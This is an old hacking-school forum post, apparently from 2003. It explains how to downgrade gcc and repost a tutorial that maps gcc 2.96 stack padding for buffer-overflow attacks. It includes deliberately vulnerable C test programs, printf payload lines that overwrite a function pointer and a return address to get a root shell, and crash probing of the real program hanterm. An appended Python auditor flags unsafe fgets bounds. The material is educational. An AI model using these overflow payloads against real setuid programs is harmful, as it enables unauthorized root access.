http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=68
Most of the documents I have posted below are lectures written for
environments with gcc compiler version 2.95 or earlier. So if you practice
buffer overflows in an environment with gcc 2.96 or later installed, some
parts will differ from what the documents describe.
The document below explains how to deal with that.
The learning approach I recommend is to study buffer overflows in an
environment with gcc 2.95 or earlier first, and then learn how to apply them
on gcc 2.96 and later. For reference, F.T.Z uses gcc 2.95 or earlier, so you
can study there without being affected by the changed buffer layout. If you
want to study at home or on another server, you can use the older gcc by
following the steps below.
1. Check the gcc version on my server.
[root@hancom root]# gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (HancomLinux 2.2 2.96-99hl)
[root@hancom root]#
--> It is 2.96 or later.
2. Check which package contains the gcc program.
[root@hancom root]# rpm -qf /usr/bin/gcc
gcc-2.96-99hl
[root@hancom root]#
--> Removing this package will remove gcc too, right?
3. Remove that package.
[root@hancom root]# rpm -e gcc-2.96-99hl --nodeps
[root@hancom root]#
4. Install the older gcc (the older gcc is included in the egcs package).
[Download] <- egcs-1.1.2 package
<Install>
[root@hancom egc]# rpm -ivh egcs-1.1.2-30.i386.rpm --nodeps --force
Preparing... ########################################### [100%]
1:egcs ########################################### [100%]
[root@hancom egc]#
5. Verify
[root@hancom egc]# gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
[root@hancom egc]#
--> Oh yeah, it is now 2.91.
6. To restore the previous gcc again, do the reverse: uninstall egcs and
then install gcc-2.96-99hl, right?
[root@hancom egc]# rpm -e egcs-1.1.2-30 --nodeps
[root@hancom egc]# mount /dev/cdrom
[root@mongii /root]# rpm -ivh /mnt/cdrom/RedHat/RPMS/gcc-2.96-99hl.i386.rpm
gcc ##################################################
[root@hancom root]# gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (HancomLinux 2.2 2.96-99hl)
[root@hancom root]#
* Oops, I forgot one thing. There is a separate option that compiles with
the old buffer layout without installing the older gcc.
ex) gcc -o test test.c -mpreferred-stack-boundary=2
With the option above, gcc 2.96 and later can also compile with the buffer
layout of 2.95 and earlier. If you are building a test or public hacking
server, or find it inconvenient to pass the option every time, use the method
described first.
---------------------------------------------------------------------------
Buffer layout under GCC version 2.96 -. hackerleon in Null@Root
Red Hat 7.0 and later adopt gcc 2.96.
In programs compiled with gcc 2.96 you can see that the buffer layout is changed.
In this article I want to work out the buffer layout under gcc 2.96.
A while ago on my homepage, NaNu9 posted a research note about problems with the frame pointer under gcc version 2.96 ^^ thanks!! Building on that result, I want to see how it applies to existing vulnerable programs, what the memory layout looks like under gcc 2.96, and how it can be applied to BOF and FSB.
First, post 470 in the Q&A section of http://hackerleon.cybersoldier.net is taken as the basic premise.
Let us compile the same source below with gcc 2.91 and with gcc 2.96.
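//test1.c
#include "dumpcode.h"
#include <stdio.h>
int main()
{ char buf2[12];
  char buf[20];
  fgets(buf,128,stdin);   /* deliberately reads up to 128 bytes into the 20-byte buf */
  printf("buf1:%x , buf2:%x, %d\n",buf,buf2,buf2-buf);   /* addresses and distance */
  dumpcode((char*)buf,64);   /* hex dump of 64 bytes starting at buf */
}
With test1 we will look at the memory layout of the program compiled with gcc 2.96 and with gcc 2.91.
First, the result with gcc 2.91.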
$ gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
$ gcc test1.c -o test1
$./test1
a
buf1:bffffa98 , buf2:bffffaac, 20
0xbffffa98 61 0a 00 40 34 97 04 08 60 ae 00 40 04 fb ff bf a..@4...`..@....
0xbffffaa8 b8 fa ff bf 4b 84 04 08 20 97 04 08 34 97 04 08 ....K... ...4...
0xbffffab8 d8 fa ff bf cb 29 03 40 01 00 00 00 04 fb ff bf .....).@........
0xbffffac8 0c fb ff bf 68 38 01 40 01 00 00 00 b0 83 04 08 ....h8.@........
The result above is one we have seen many times, and it is the expected one. Schematically:
[buf(20)][buf2(12)][ebp(4)][ret]
It can be inferred easily even without taking a dump.
Now the result with gcc 2.96.
$gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (Red Hat Linux 7.1 2.96-81)
$gcc test1.c -o test1
$./test1
a
buf1:bfffefa0 , buf2:bfffefc0, 32
0xbfffefa0 61 0a 00 40 a8 ca 13 40 44 f0 ff bf ce 6b 12 40 a..@...@D....k.@
0xbfffefb0 e8 ef ff bf 20 d0 00 40 50 83 04 08 a8 ca 13 40 .... ..@P......@
0xbfffefc0 44 f0 ff bf 44 63 01 40 e8 ef ff bf d1 84 04 08 D...Dc.@........
0xbfffefd0 18 98 04 08 fc 98 04 08 18 f0 ff bf fc bb 03 40 ...............@
This result is very odd. The distance from buf to buf2 came out as 32 bytes,
and the memory layout also shows a very odd arrangement. Schematically:
[buf(20)][dummy1(12)][buf2(12)][dummy2(4)][dummy3(8)][ebp(4)][ret]
You can see dummy regions (a name chosen arbitrarily) inserted between the variables in memory.
So under gcc 2.96 the memory layout is hard to work out...
On a boring summer evening with nothing to do, I did some grunt work and found an interesting regularity.
I varied the sizes of buf and buf2 in test1 and computed the distance from buf to buf2.
[http://hackerleon.cybersoldier.net/images/gcc296.jpg]
- See Table 1 -
Looking at Table 1 (I really must have had nothing to do ^^):
the distance steps in multiples of 16 with the size of buf. For a size above one multiple of 16 and up to the next multiple of 16, the distance is that next multiple of 16, provided buf2 is 12 bytes or larger.
That is, in test1 buf is 20 bytes, so it falls in the range 16 < buf <= 32, and therefore the distance to buf2 is "32".
Now let us pick an arbitrary buf size and compute the distance to buf2.
buf=200
buf2=12
Here 16x12=192 and 16x13=208, so it falls in the range 192 < buf <= 208. If the idea above is right, the distance should therefore come out as 208.
Let us change the size of buf and run it to see whether this idea holds.
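//test2.c
#include <stdio.h>
int main()
{ char buf2[12];
  char buf[200];
  fgets(buf,224,stdin);   /* deliberately reads up to 224 bytes into the 200-byte buf */
  printf("buf1:%x , buf2:%x, %d\n",buf,buf2,buf2-buf);   /* addresses and distance */
}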
$gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (Red Hat Linux 7.1 2.96-81)
$gcc test2.c -o test2
$./test2
a
buf1:bfffeef0 , buf2:bfffefc0, 208
The idea was right.
So under gcc 2.96 too, if the source places no limit on variable input, we can infer the memory layout of a vulnerable program and attack it ^^
Next, let us look at the layout from buf2 to ret.
The result from test1:
[buf(20)][dummy1(12)][buf2(12)][dummy2(4)][dummy3(8)][ebp(4)][ret]
We saw that it looks like this. We already worked out the length of the dummy between buf and buf2; now let us work out the distance from buf2 to ret.
It seems to be the same here too ^^
Look at test3.
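//test3.c
#include "dumpcode.h"
#include <stdio.h>
int main()
{ char buf[20];
  fgets(buf,64,stdin);   /* deliberately reads up to 64 bytes into the 20-byte buf */
  dumpcode((char*)buf,64);   /* hex dump of 64 bytes starting at buf */
}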
$./test3
a
0xbfffefb0 61 0a 00 bf 20 d0 00 40 50 83 04 08 a8 ca 13 40 a... ..@P......@
0xbfffefc0 44 f0 ff bf 44 63 01 40 e8 ef ff bf d1 84 04 08 D...Dc.@........
0xbfffefd0 d0 97 04 08 b4 98 04 08 18 f0 ff bf fc bb 03 40 ...............@
0xbfffefe0 01 00 00 00 44 f0 ff bf 4c f0 ff bf 66 83 04 08 ....D...L...f...
Checking ret with gdb here, the ret value came out as 0x4003bbfc, so
ret is at 0xbfffefdc.
Here too, as computed earlier, we can see that the dummy is generated based on the maximum of the multiple-of-16 range that the size of buf2 falls in.
buf is 20, so it falls in the range 16 < buf <= 32, and therefore the distance from buf to dummy3 is 32.
To summarize:
[buf(20) ----> 32(20+12)][dummy3(8)][ebp(4)][ret]
Haha, the distance to ret can also be computed and inferred.
Now let us compile a real BOF problem with gcc 2.96 and check whether our reasoning is right.
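//test4.c
#include <stdio.h>
#include <unistd.h>   /* setreuid() */
void printit() {
  printf("Hello there!\n");
}
int main()
{ int crap;
  void (*call)()=printit;   /* function pointer stored on the stack above buf */
  char buf[20];
  fgets(buf,50,stdin);   /* deliberately reads up to 50 bytes into the 20-byte buf */
  setreuid(0,0);
  call();
}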
This is a source seen in many places ^^ (mainsource newbie problem 13)
Under gcc 2.96, the address used to call printit comes right after buf(20), so by setting up an egg and entering [20][egg] one would have obtained a shell immediately.
So what about the one compiled with gcc 2.96? Following what we studied above:
First, the size of buf is 20, so it is in the range 16 < buf <= 32, and therefore the distance from buf to dummy3 is 32.
The size of dummy3 is 8 bytes, as seen above, so the distance to the address used to call printit is 32+8 = 40 bytes.
So the attack is [40][egg]. Let us check whether that is right.
egg:0xbffffa78
$(printf "AAAA...(40)\x78\xfa\xff\xbf";cat)\./test4
id
uid=500(leon) gid=(500)leon euid=0(root)
It works.
Now let us solve a problem that overwrites the return address.
//test5.c
#include <stdio.h>
int main()
{
  char buf[20];
  printf("name :");
  fgets(buf,50,stdin);   /* deliberately reads up to 50 bytes into the 20-byte buf */
  printf("Hi %s",buf);
}
Likewise, under 2.91, after setting up the egg, the layout is [20][ebp][ret], so
the attack would be [24][&egg]. Under 2.96, however, applying the above:
buf is 20 bytes, so 16 < buf < 32; therefore the distance from buf to dummy3 is 32 bytes, dummy3 is 8 bytes and sfp is 4 bytes, which gives
[20][12][8][4] => the attack must be [44 bytes][egg]. So:
egg:0xbffffa78
$(printf "AAAA...(44)\x78\xfa\xff\xbf";cat)\./test4
id
uid=500(leon) gid=(500)leon euid=0(root)
It works again ^^.
Now, while we are at it, let us apply this to "hanterm", the byword for bugs in commercial programs.
First, under gcc 2.91:
$ gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
$hanterm -fn `perl -e "print 'a'x88"`
can't load english font aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa~~(omitted)~aaaaaaa
세그멘테이션 오류
A segfault occurred at 88 bytes; that is, we can infer that the layout is [84][fsb][ret] and attack accordingly.
So what happens under 2.96? Let us infer the buffer layout.
First, the variable for the -fn option (call it 'buf' for convenience) is 84 bytes, so
16x5=80 < buf < 16x6=96
Therefore the distance from buf to dummy3 is 96 bytes, so
we get [96][8][4][ret]. That is, the first segfault should occur at 108. Let us see whether that is really so.
$gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (Red Hat Linux 7.1 2.96-81)
$hanterm -fn `perl -e "print 'a'x107"`
can't load english font aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa~~(omitted)~aaaaaaaaaaaaaaaa
$hanterm -fn `perl -e "print 'a'x108"`
can't load english font aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa~~(omitted)~aaaaaaaaaaaaaaaaa
세그멘테이션 오류
Just as expected ^^
So hanterm under 2.96 can be attacked as well.
Through a few examples, we are now able to infer relative memory positions under gcc 2.96 too.
But here
there is one very important point.
Namely, if the fgets input limit is set small, no overflow is possible.
So for gcc 2.96 we can summarize as follows.
1. The distance between variable 1 and variable 2 is the upper multiple of 16 of the range that variable 1's size falls in (provided variable 2 is 12 bytes or larger).
2. dummy3 (8 bytes) is allocated where the variable definitions end.
3. If the input range for a variable is kept at or below the upper multiple of 16 that the variable falls in, no bug due to BOF occurs.
In a somewhat disorganized way, we have looked at how this applies to vulnerable programs under gcc 2.96.
It should be useful for computing the ret value for FSB in programs compiled with gcc 2.96, for finding ret for BOF, and so on; I hope more research gets done.
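Added example (not part of the original post or of hackerleon's article): a small Python audit, taking the defender's side of summary point 3, that pairs each `char name[N]` declaration in a C source with its `fgets(name, M, ...)` call and classifies the read bound. The `SAMPLE` source, the function names and the use of the article's observed 16-byte rule are assumptions of this example; the rule is the article's empirical finding for gcc 2.96, not guaranteed compiler behaviour.

```python
import re

# Constructed sample modelled on the article's test programs (not page code verbatim).
SAMPLE = """
main()
{ char buf2[12];
  char buf[20];
  char name[200];
  fgets(buf,128,stdin);
  fgets(buf2,12,stdin);
  fgets(name,208,stdin);
}
"""

DECL = re.compile(r"\bchar\s+(\w+)\s*\[\s*(\d+)\s*\]")
CALL = re.compile(r"\bfgets\s*\(\s*(\w+)\s*,\s*(\d+)\s*,")


def slot_size(size, align=16):
    """Bytes the article observed gcc 2.96 reserving for a buffer:
    its size rounded up to the next multiple of 16 (an empirical rule)."""
    return -(-size // align) * align


def audit_fgets(source):
    """Return (buffer, declared size, fgets bound, verdict) per fgets call."""
    sizes = {name: int(n) for name, n in DECL.findall(source)}
    findings = []
    for name, bound in CALL.findall(source):
        if name not in sizes:
            continue  # destination is not a local char array we can size
        size, bound = sizes[name], int(bound)
        if bound <= size:
            verdict = "ok"  # fgets writes at most `bound` bytes including the NUL
        elif bound <= slot_size(size):
            verdict = "overflow-into-padding"  # still a defect; absorbed only by this layout
        else:
            verdict = "overflow-past-slot"  # can reach neighbouring stack data
        findings.append((name, size, bound, verdict))
    return findings


if __name__ == "__main__":
    for finding in audit_fgets(SAMPLE):
        print(finding)
```

Only the "ok" verdict is portable: a bound that merely stays inside the padding depends on one compiler's layout and becomes a real overwrite when the same source is built with `-mpreferred-stack-boundary=2` or with gcc 2.95 and earlier.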
Hit : 13701 Date : 2003/09/19 11:46